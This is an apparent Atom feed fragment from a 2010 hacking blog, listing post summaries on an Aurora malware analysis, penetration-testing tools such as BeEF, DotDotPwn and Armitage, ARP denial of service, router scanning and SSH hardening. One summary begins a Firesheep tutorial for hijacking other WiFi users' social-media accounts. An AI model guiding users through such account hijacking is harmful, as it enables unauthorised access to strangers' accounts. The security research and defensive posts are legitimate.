width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7858132184344543616</id><published>2010-12-22T06:31:00.001+08:00</published><updated>2011-06-20T01:37:54.632+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>ad_1_.jpg unpacking/analysis - Aurora</title><summary type='text'>In this post we'll try to run Aurora as non-administrative user, and  debug ad_1_.jpg which used by the attackers right after the attack.  
Well, I was very curious about other files in the attack, after not being able to unpack the msconfig32.sys, and thought, maybe other files will give me clues on msconfig32.sys and might give me a way of unpacking it.

I've looked into USCERT advisory regarding </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7858132184344543616/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/ad1jpg-unpackinganalysis-aurora.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7858132184344543616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7858132184344543616'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/ad1jpg-unpackinganalysis-aurora.html' title='ad_1_.jpg unpacking/analysis - Aurora'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Kde3g35OnUQ/S8njxstzsJI/AAAAAAAAAGo/LRI04scXMPE/s72-c/Screen+shot+2010-04-17+at+7.32.21+PM.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1400610897748897158</id><published>2010-12-21T06:34:00.001+08:00</published><updated>2011-06-20T01:41:00.461+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wifi'/><title type='text'>Hack into computers through WiFi</title><summary type='text'>In this tut you'll be learning how to access someone's facebook/youtube and many other accounts who is using the same WiFi as you.

You need Mozilla Firefox. Firesheep - firefox add-on: http://codebutler.github.com/firesheep/
WinPcap if you have Windows: http://www.winpcap.org/install/default.htm
 
Install WinPcap then drag the Firesheep add-on and put it on the Firefox icon.
Firefox will open and</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1400610897748897158/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/hack-into-computers-through-wifi.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1400610897748897158'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1400610897748897158'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/hack-into-computers-through-wifi.html' title='Hack into computers through WiFi'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3687893555996517976</id><published>2010-12-21T03:43:00.002+08:00</published><updated>2010-12-21T03:43:41.777+08:00</updated><title type='text'>DotDotPwn v2.1 - The Directory Traversal Fuzzer</title><summary type='text'>It's  a very flexible intelligent fuzzer to discover traversal directory  vulnerabilities in software such as Web/FTP/TFTP servers,Web platforms  such as CMSs,ERPs,Blogs,etc.Also,it has a protocol independent module to  send the desired payload to the host and port specified. 
On the other  hand,it also could be used in a scripting way using the STDOUT  module.It's written in perl programming </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3687893555996517976/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/dotdotpwn-v21-directory-traversal.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3687893555996517976'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3687893555996517976'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/dotdotpwn-v21-directory-traversal.html' title='DotDotPwn v2.1 - The Directory Traversal Fuzzer'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_xJ5LrusWfss/TP1WVPqPKwI/AAAAAAAAAts/gMVefapDzfg/s72-c/ddpwnasciiart.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-895256849450896085</id><published>2010-12-21T03:00:00.004+08:00</published><updated>2010-12-21T03:13:54.201+08:00</updated><title type='text'>Beef - v0.4.2-alpha Browser Exploitation Framework</title><summary type='text'>BeEF, the Browser Exploitation Framework is a professional security tool  provided for lawful research and testing purposes. It allows the  experienced penetration tester or system administrator additional attack  vectors when assessing the posture of a target. 
The user of BeEF will  control which browser will launch which command module and at which  target. 

BeEF hooks one or more web browsers</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/895256849450896085/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/beef-v042-alpha-browser-exploitation.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/895256849450896085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/895256849450896085'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/beef-v042-alpha-browser-exploitation.html' title='Beef - v0.4.2-alpha Browser Exploitation Framework'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2101904004150390512</id><published>2010-12-21T02:42:00.001+08:00</published><updated>2011-06-20T01:44:14.478+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Samurai WTF v0.95 Released</title><summary type='text'>Samurai Web Testing Framework - Web penetration testing live CD built on open source software

The  Samurai Web Testing Framework is a live linux environment that has been  pre-configured to function as a web pen-testing environment. The CD  contains the best of the open source and free tools that focus on  testing and attacking websites. In developing this environment, we have  based our tool </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2101904004150390512/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/samurai-wtf-v095-released.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2101904004150390512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2101904004150390512'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/samurai-wtf-v095-released.html' title='Samurai WTF v0.95 Released'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2204582259823595035</id><published>2010-12-21T02:25:00.002+08:00</published><updated>2011-06-21T00:45:39.149+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Secunia Personal Software Inspector v2.0 Released</title><summary type='text'>FREE PC Security for Home Users 

The Secunia PSI is a FREE security tool designed to detect vulnerable and out-dated programs and plug-ins which expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus and are therefore increasingly "popular" among criminals. 
The only solution to block these kind of attacks is to  apply </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2204582259823595035/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/secunia-personal-software-inspector-v20.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2204582259823595035'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2204582259823595035'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/secunia-personal-software-inspector-v20.html' title='Secunia Personal Software Inspector v2.0 Released'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/TQ-JtF7GWoI/AAAAAAAAAuw/stBmZBYzC-w/s72-c/psi-19e36dde43062df3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4001685344693533868</id><published>2010-12-16T22:45:00.004+08:00</published><updated>2011-06-21T00:46:52.708+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>ARP Land Attack</title><summary type='text'>Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…” Not so fast.
I’ve actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer </summary><link rel='related' href='http://c0decstuff.blogspot.com/2010/12/yeah-you-know-deal.html' title='ARP Land Attack'/><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4001685344693533868/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/yeah-you-know-deal.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4001685344693533868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4001685344693533868'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/yeah-you-know-deal.html' title='ARP Land Attack'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rIh95t1bhWM/TQonKUwnMVI/AAAAAAAAAIY/ml7XBREaSRQ/s72-c/ARP_Land_Attack.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2787813740123171480</id><published>2010-12-06T02:40:00.002+08:00</published><updated>2011-06-21T00:43:59.836+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web'/><title type='text'></title><summary type='text'>Finding Backdoor Site
To find backdoor site go to http://www.domaintools.com/ and in Whois Lookup enter your TARGET site


 As a result you'll get Whois Record

Look for Reverse IP
In our case 25 other sites hosted on this server.
Click on it to see names of the hosted sites on the same server. You will see few of them, to see all, click on more... 

To see them all you must be a member.
You </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2787813740123171480/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/finding-backdoor-site-to-find-backdoor.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2787813740123171480'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2787813740123171480'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/finding-backdoor-site-to-find-backdoor.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3992218326142931536</id><published>2010-11-30T17:17:00.004+08:00</published><updated>2011-06-20T01:42:33.846+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'></title><summary type='text'>http://c0decstuff.blogspot.com/2010/11/armitage-v11.html


Armitage - Cyber Attack Management for Metasploit 
Armitage  is a graphical cyber attack management tool for Metasploit that  visualizes your targets, recommends exploits, and exposes the advanced  capabilities of the framework. Armitage aims to make Metasploit usable  for security practitioners who understand hacking but don't use  </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3992218326142931536/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/armitage-v11.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3992218326142931536'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3992218326142931536'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/armitage-v11.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/TPIjkS-6P1I/AAAAAAAAAtU/3DdD6nKn0PA/s72-c/armitage4.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1676984103436721599</id><published>2010-11-30T17:15:00.001+08:00</published><updated>2011-06-20T01:02:12.885+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'></title><summary type='text'>Arachni v0.2.1 - Web Application Security Scanner Framework

Arachni is a feature-full, modular,  high-performance Ruby framework aimed towards helping penetration  testers and administrators evaluate the security of web applications.
Arachni  is smart,it trains itself by learning from the HTTP responses it  receives during the audit process.Unlike other scanners,Arachni takes  into account the </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1676984103436721599/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/arachni-v0.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1676984103436721599'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1676984103436721599'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/arachni-v0.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4013974720720097443</id><published>2010-11-23T05:45:00.009+08:00</published><updated>2011-06-20T00:56:31.713+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'></title><summary type='text'>Play With Routers, &amp; Node EnnumerationThis article describes how I was able to find linksys routers open to  vulnerability.  If you have a Linksys router make sure you have taken  the proper steps to  securing yourself.  There is a follow up to this article here. I scanned a rather large portion of IP's (2 class C IP ranges).  If you don't know what port scanning is click here.   
There are </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4013974720720097443/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/hacking-linksys-routers-node.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4013974720720097443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4013974720720097443'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/hacking-linksys-routers-node.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i54.tinypic.com/2gtu1xf_th.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8747548284639486123</id><published>2010-11-20T23:57:00.001+08:00</published><updated>2011-06-21T23:17:21.936+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'></title><summary type='text'>Backward disassembler for ROP exploitation

bdasm is a PyCommand that I wrote for Immunity Debugger (v 1.73) which can search the address space of a process for a certain opcode/instruction and disassemble backward and forward for a specified number of instructions.
This is especially useful in the exploit development process when  existing gadget finding tools do not produce the results you</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8747548284639486123/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/backward-disassembler-for-rop.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8747548284639486123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8747548284639486123'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/backward-disassembler-for-rop.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8718571707454102799</id><published>2010-11-20T23:47:00.001+08:00</published><updated>2011-06-21T00:59:18.519+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'></title><summary type='text'>Application Layer DDoS Simulator

https://sourceforge.net/projects/ddosim/.

ddosim  is a tool that can be used in a laboratory environment to simulate a  distributed denial of service (DDOS) attack against a target server. The  test will show the capacity of the server to handle application  specific DDOS attacks. ddosim simulates several zombie hosts  (having random IP addresses) which create </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8718571707454102799/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/application-layer-ddos-simulator.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8718571707454102799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8718571707454102799'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/11/application-layer-ddos-simulator.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8170990796471132247</id><published>2010-10-05T16:59:00.002+08:00</published><updated>2011-06-21T23:03:13.824+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Browser'/><title type='text'></title><summary type='text'>Google Chome + Google SSL default search engineHere's just a short and simple tutorial for those looking to set google's ssl search as their default search engine in Google Chrome. I found it to be pretty useful, and I hope that you do as well.


1) Go to Chrome's option menu (top right wrench-&gt;options [in the latest Chrome beta])
2) Under the "Basics" tab, click the "Manage" button next to the "</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8170990796471132247/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/google-chome-google-ssl-default-search.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8170990796471132247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8170990796471132247'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/google-chome-google-ssl-default-search.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3648577828257685545</id><published>2010-10-03T09:07:00.004+08:00</published><updated>2010-10-03T09:12:01.553+08:00</updated><title type='text'></title><summary type='text'>Methods to block SSH attacksMethods:
1. Allow the IPs you would like to have access to SSH through your firewall.
Example:   iptables -A INPUT -i eth0 -s 10.10.10.10 -p tcp --dport 22 -j ACCEPT
2. Change SSH port.

Example:

Edit your ssh configuration file under /etc/ssh/sshd_config and add/replace this line:
Port 6445
3. Use a utility like BFD, BlockHosts and DenyHosts
4. Use iptables to limit</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3648577828257685545/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/methods-to-block-ssh-attacks-methods-1.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3648577828257685545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3648577828257685545'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/methods-to-block-ssh-attacks-methods-1.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2579611841379798375</id><published>2010-10-03T07:09:00.001+08:00</published><updated>2011-06-20T01:29:49.595+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'></title><summary type='text'>Configuring Granular Password Settings in Windows Server 2008 – The Easy Way
This article will demonstrate "The Easy Way" of how to handle Granular Password Policies – also known as Fine-Grained Password Policies - in a Windows Server 2008 domain environment. Different approaches

Like with many other areas of Windows administration you have several  different options when it comes to handling the</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2579611841379798375/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/configuring-granular-password-settings.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2579611841379798375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2579611841379798375'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/configuring-granular-password-settings.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2654944189213863426</id><published>2010-10-03T05:45:00.002+08:00</published><updated>2010-10-03T05:56:10.940+08:00</updated><title type='text'></title><summary type='text'>FREE: Win IP Config – GUI replaces ipconfig, route, and netstatping command is the main reason why I still use the command prompt regularly. Well, that is not really true. Another command, I use frequently, is ipconfig. I usually need it whenever I have connection problems. It is the fastest way to get an overview of a PC’s network configuration. 
When I had to use it again recently, I thought it </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2654944189213863426/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/win-ip-config-gui-replaces-ipconfig.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2654944189213863426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2654944189213863426'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/10/win-ip-config-gui-replaces-ipconfig.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2108067746076485807</id><published>2010-09-21T15:52:00.003+08:00</published><updated>2010-09-21T15:54:06.298+08:00</updated><title type='text'></title><summary type='text'>idsecconf 2010 Bali -- Call of paper
We, the idsecconf 2010 Bali committee, invite fellow computer security practitioners throughout Indonesia to participate by submitting papers. The main topic we are looking for relates to: "Security in electronic banking and electronic payment transactions"
Explicitly, this covers (but is not limited to):- securing </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2108067746076485807/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/09/idsecconf-2010-bali-call-of-paper-kami.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2108067746076485807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2108067746076485807'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/09/idsecconf-2010-bali-call-of-paper-kami.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_rIh95t1bhWM/TH6zGZVYfwI/AAAAAAAAAIM/Bw9p0mufjJo/s72-c/bgx.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-123992992219231046</id><published>2010-09-21T15:48:00.001+08:00</published><updated>2011-06-21T23:32:45.687+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'></title><summary type='text'>RIPS version 0.33 Released
RIPS - A static source code analyser for vulnerabilities in PHP scripts. The code viewer especially has been improved (variable highlighting, drag+droppable, resizable window, active jumping between function calls and declarations) and is not only good for analyzing vulnerabilities manually but also for understanding foreign code quickly. Also a lot of new features like </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/123992992219231046/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/09/rips-version-0.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/123992992219231046'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/123992992219231046'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/09/rips-version-0.html' title=''/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 